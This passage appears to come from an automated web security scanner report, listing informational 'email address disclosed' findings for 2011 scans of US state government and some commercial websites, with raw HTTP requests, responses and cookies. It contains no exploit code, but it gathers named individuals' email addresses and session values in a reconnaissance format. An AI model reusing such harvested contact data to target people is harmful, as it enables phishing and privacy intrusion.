<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>

       <title>DHR.KY.GOV - Home Page</title>
       
       <meta
...[SNIP]...
<a href="mailto:kytc.ddlwebservices@ky.gov">
...[SNIP]...

22.35. http://dnr.maryland.gov/service/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dnr.maryland.gov
Path:   /service/

Issue detail

The following email address was disclosed in the response:

Request

GET /service/ HTTP/1.1
Host: dnr.maryland.gov
Proxy-Connection: keep-alive
Referer: http://www.maryland.gov/onlineservices/Pages/onlineservices.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=267304850.1304117506.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=267304850.1573057516.1304117506.1304117506.1304123952.2; __utmc=267304850; __utmb=267304850

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:59:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 12322
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSBTDSBR=FJMDKNEBKFOKABEAMMEPDJAI; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3
...[SNIP]...
<a href="mailto:customerservice@dnr.state.md.us?Subject=Service Center Suggestion">
...[SNIP]...

22.36. http://dola.colorado.gov/dem/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dola.colorado.gov
Path:   /dem/index.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /dem/index.html HTTP/1.1
Host: dola.colorado.gov
Proxy-Connection: keep-alive
Referer: http://www.colorado.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:23:04 GMT
Server: Apache/2.0.59 (Win32) mod_jk/1.2.18 mod_ssl/2.0.59 OpenSSL/0.9.8b JRun/4.0
Last-Modified: Mon, 04 Apr 2011 22:44:51 GMT
ETag: "46-3605-81f39234"
Accept-Ranges: bytes
Content-Length: 13829
Content-Type: text/html
Via: 1.1 dola.colorado.gov (Apache/2.2.11)

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><!-- Insta
...[SNIP]...
<a href="mailto:gigi.garcia@state.co.us">
...[SNIP]...
<a href="mailto:dola.helpdesk@state.co.us?subject=DEM">dola.helpdesk@state.co.us</a>
...[SNIP]...

22.37. http://fastcache.gawkerassets.com/assets/base.v10/static/base.v10.widget.20110427.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fastcache.gawkerassets.com
Path:   /assets/base.v10/static/base.v10.widget.20110427.js

Issue detail

The following email address was disclosed in the response:

Request

GET /assets/base.v10/static/base.v10.widget.20110427.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: fastcache.gawkerassets.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: application/x-javascript
Date: Sat, 30 Apr 2011 12:17:17 GMT
ETag: "7db5935-31916-383d4ec0+gzip"
Expires: Sat, 30 Apr 2011 12:22:17 GMT
GawkerApplication: ganja
GawkerApplicationHost: PEST-45
GawkerHost: GM40 - D=4497 t=1303901551215288
Last-Modified: Wed, 27 Apr 2011 10:51:15 GMT
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Server: ECS (dca/532A)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 203030

(function(a){a.widget("ui.AdminLogWidget",{initialize:function(){this.settings=[];this.xhr=new XHR({klass:"adminlog",success:this.handleAjaxSuccess.bind(this)});this.registerEventHandler(this.element,
...[SNIP]...
<a href="mailto:help@gawker.com">help@gawker.com</a>
...[SNIP]...
<a href="help@gawker.com">help@gawker.com</a>
...[SNIP]...
<a href="mailto:help@gawker.com">help@gawker.com</a>
...[SNIP]...
<a href="mailto:help@gawker.com">help@gawker.com</a>
...[SNIP]...

22.38. https://fin.oaks.ohio.gov/psp/FNPRD/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://fin.oaks.ohio.gov
Path:   /psp/FNPRD/

Issue detail

The following email address was disclosed in the response:

Request

GET /psp/FNPRD/ HTTP/1.1
Host: fin.oaks.ohio.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: fin.oaks.ohio.gov=R1934382832; path=/
Date: Sat, 30 Apr 2011 12:20:09 GMT
Content-Length: 12902
Content-Type: text/html; CHARSET=utf-8
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: FNPRD-PORTAL-PSJSESSIONID=8SKyN72hGDFKBkl1QC8vYfpb7c1J2114!-669996233; domain=.oaks.ohio.gov; path=/
Cache-Control: no-store
RespondingWithSignonPage: true
Connection: close

<!--* ******************************************************************
* Confidentiality Information:
*
* This module is the confidential and proprietary information of
* PeopleSoft, Inc.;
...[SNIP]...
<A title="mailto:oaks.helpdesk@oaks.state.oh.us" href="mailto:oaks.helpdesk@oaks.state.oh.us"><SPAN title="mailto:oaks.helpdesk@oaks.state.oh.us">oaks.helpdesk@oaks.state.oh.us</SPAN>
...[SNIP]...

22.39. http://ga.gov/gta/mc/includes/omniture/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ga.gov
Path:   /gta/mc/includes/omniture/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /gta/mc/includes/omniture/s_code.js HTTP/1.1
Host: ga.gov
Proxy-Connection: keep-alive
Referer: http://ga.gov/00/home/0,2061,4802,00.html;jsessionid=E163D8F13AEF17647444D0A429B79A87
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=E163D8F13AEF17647444D0A429B79A87; vgnvisitor=2w45tg00s3c00001jrJkq8F01b

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:07:19 GMT
Server: Apache/1.3.29 (Unix)
Last-Modified: Sat, 01 Jan 2011 05:43:45 GMT
ETag: "655f0-6672-4d1ebf11"
Accept-Ranges: bytes
Content-Length: 26226
Content-Type: application/x-javascript

/* SiteCatalyst code version: H.16.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
hav()+q+(qs?qs:s.rq(^C)),0,id,ta);qs`e;`Wm"
+"('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@h;`l@h`L^9,`G$61',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$w)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Btc=1;s.flush`a()}`2$l`Atl`0o,t,n,"
+"vo`1;s.@G=@vo`R`N^M=t;s.`N`i=n;s.t(@h}`5pg){`F@0co`0o){`K@J\"_\",1,#A`2@vo)`Awd@0gs`0$S{`K@J$o1,#A`2s.t()`Awd@0dc`0$S{`K@J$o#A`2s.t()}}@3=(`F`J`Y`8`4@ts@d0`Rd=^L
...[SNIP]...

22.40. https://georgiawildlife.dnr.state.ga.us/service/login1.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://georgiawildlife.dnr.state.ga.us
Path:   /service/login1.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /service/login1.asp HTTP/1.1
Host: georgiawildlife.dnr.state.ga.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDCCRQTQAT=JJGJOMPANKAFPMLCIIKOKEKL;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:20:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 28917
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCCBDBRT=MNHLBBNBFOPGOOKAIIBNMDLG; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1" runat="serve
...[SNIP]...
<meta name="contact" content="mchadwell@gadnr.org" />
...[SNIP]...

22.41. https://hcm.oaks.ohio.gov/psp/HCPRD/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://hcm.oaks.ohio.gov
Path:   /psp/HCPRD/

Issue detail

The following email address was disclosed in the response:

Request

GET /psp/HCPRD/ HTTP/1.1
Host: hcm.oaks.ohio.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: hcm.oaks.ohio.gov=R2338435115; path=/
Date: Sat, 30 Apr 2011 12:20:31 GMT
Content-Length: 14341
Content-Type: text/html; CHARSET=utf-8
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: HCPRD-PORTAL-PSJSESSIONID=l6sLN72PQQ42bBRK22SfpKLTH5zqJJvN!-609733431; domain=.oaks.ohio.gov; path=/
Cache-Control: no-store
RespondingWithSignonPage: true
Connection: close

<!--* ******************************************************************
* Confidentiality Information:
*
* This module is the confidential and proprietary information of
* PeopleSoft, Inc.;
...[SNIP]...
<a href="mailto:HRCustomerService@das.state.oh.us"> HRCustomerService@das.state.oh.us</a>
...[SNIP]...

22.42. http://home.mcafee.com/Root/AboutUs.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.mcafee.com
Path:   /Root/AboutUs.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /Root/AboutUs.aspx?id=contactUs HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:55 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:55 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lBounceURL=http://home.mcafee.com/Root/AboutUs.aspx?id=contactUs; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:55 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:55 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fRoot%2fAboutUs.aspx%3fid%3dcontactUs&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV3
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:18:55 GMT
Content-Length: 35336
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...
<a href="mailto:virus_research@nai.com">virus_research@nai.com</a>
...[SNIP]...
<a href="mailto:advertising@mcafee.com">advertising@mcafee.com</a>
...[SNIP]...
<a href="mailto:affiliates@mcafee.com">affiliates@mcafee.com</a>
...[SNIP]...
<a href="mailto:partner_info@mcafee.com">partner_info@mcafee.com</a>
...[SNIP]...

22.43. https://home.mcafee.com/Scripts/instant_invite/ProActiveChatSmartButton.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://home.mcafee.com
Path:   /Scripts/instant_invite/ProActiveChatSmartButton.js

Issue detail

The following email address was disclosed in the response:

Request

GET /Scripts/instant_invite/ProActiveChatSmartButton.js HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Sun, 16 Jan 2011 05:06:30 GMT
Accept-Ranges: bytes
ETag: "04fb2223bb5cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
MS: SJV4
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:18:34 GMT
Content-Length: 9826
Connection: close

var elem = document.getElementsByTagName('div');

function GetSmartButtonHome(blnSecure, cultureCode) {
var oURL;
var deptNumForSite;
var sourceImg;

if (blnSecure == "True") {
...[SNIP]...
<a href="mailto:sales@instantservice.com">
...[SNIP]...

22.44. http://housing.utah.gov/news/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://housing.utah.gov
Path:   /news/

Issue detail

The following email address was disclosed in the response:

Request

GET /news/ HTTP/1.1
Host: housing.utah.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:20:58 GMT
Server: Apache/2.2.3 (Linux/SUSE)
X-Pingback: http://housing.utah.gov/news/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head pro
...[SNIP]...
<br />
shadwest@utah.gov</p>
...[SNIP]...

22.45. http://ia.gov/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ia.gov
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: ia.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:12:11 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Set-Cookie: CAKEPHP=ejk5jm9ptanapdihm60fns6k95; path=/
Vary: Accept-Encoding
Content-Length: 19115

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<a href="mailto:iowa-webmaster@iowai.org">
...[SNIP]...

22.46. http://ia.gov/js/jq-cookies.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ia.gov
Path:   /js/jq-cookies.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/jq-cookies.js HTTP/1.1
Host: ia.gov
Proxy-Connection: keep-alive
Referer: http://ia.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CAKEPHP=p8pokrrg86sfk5b15r4349in42

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:12:12 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 01 May 2009 16:48:16 GMT
Accept-Ranges: bytes
Content-Length: 3361
Content-Type: application/x-javascript

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.
...[SNIP]...
ll be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie=function(name,value,options){if(typeof value!='undefined'){options=options||{};if(value===null){value='';options.expires=-1}var expires='';if(options.expires&&(typeof options.expir
...[SNIP]...

22.47. http://idaho.gov/appskins/idahogov200902/javascript/equalcolumns.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idaho.gov
Path:   /appskins/idahogov200902/javascript/equalcolumns.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /appskins/idahogov200902/javascript/equalcolumns.js HTTP/1.1
Host: idaho.gov
Proxy-Connection: keep-alive
Referer: http://idaho.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:14:13 GMT
Server: Apache
Last-Modified: Fri, 05 Feb 2010 23:16:48 GMT
ETag: "d996e-159f-47ee2a55b7073"
Accept-Ranges: bytes
Content-Length: 5535
Content-Type: application/x-javascript

/*
   by Paul@YellowPencil.com and Scott@YellowPencil.com
   includes TextResizeDetector by Lawrence Carvalho <carvalho@uk.yahoo-inc.com>
   feel free to delete all comments except for the above credit

...[SNIP]...
ser settings
   Fires a custom event with the following data:
   iBase : base font size
   iDelta : difference in pixels from previous setting
   iSize : size in pixel of text
   author Lawrence Carvalho carvalho@uk.yahoo-inc.com */

// @constructor
TextResizeDetector = function() {
var el = null;
   var iIntervalDelay = 200;
   var iInterval = null;
   var iCurrSize = -1;
   var iBase = -1;
   var aListeners = [];
   va
...[SNIP]...

22.48. http://in.gov/core/js/agency.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/js/agency.js

Issue detail

The following email address was disclosed in the response:

Request

GET /core/js/agency.js HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:26:56 GMT
Server: Apache
Last-Modified: Thu, 27 May 2010 20:37:32 GMT
ETag: "3e9f8c-34b2-487995c1d1b00"
Accept-Ranges: bytes
Content-Length: 13490
Content-Type: application/javascript
Content-Language: en
X-Pad: avoid browser bug
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 01:27:56 GMT; path=/

...
//Script for Options iframe pages.
function dropdown(mySel)
{
var myWin, myVal;
myVal = mySel.options[mySel.selectedIndex].value;
if(myVal)
{
if(mySel.form.target)myWin = parent[mySel.form
...[SNIP]...
</strong> (me@myemail.com).</p>
...[SNIP]...

22.49. http://in.gov/core/js/jquery.slideshow.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/js/jquery.slideshow.js

Issue detail

The following email address was disclosed in the response:

Request

GET /core/js/jquery.slideshow.js HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/core/online_services.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=173.193.214.243-3082637536.30148309:lv=1304126855900:ss=1304126855900; __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; __utmb=58136434.1.10.1304126856; BIGipServerapps_ii_oss=4046653450.36895.0000; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:29:59 GMT
Server: Apache
Last-Modified: Tue, 06 Apr 2010 18:59:52 GMT
ETag: "3e9f91-2457-483960cec7a00"
Accept-Ranges: bytes
Content-Length: 9303
Content-Type: application/javascript
Content-Language: en
X-Pad: avoid browser bug
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 01:30:59 GMT; path=/

/**
*    jquery.slideShow (1.0.6)
*    by Marcel Eichner (www.marceleichner.de)
*    <love@ephigenia.de>
*
*    This simple slideshow plugin will provide your effect gallery with
*    some simple features:

...[SNIP]...

22.50. http://in.gov/core/js/jquery.swapimage.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://in.gov
Path:   /core/js/jquery.swapimage.min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /core/js/jquery.swapimage.min.js HTTP/1.1
Host: in.gov
Proxy-Connection: keep-alive
Referer: http://in.gov/core/online_services.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
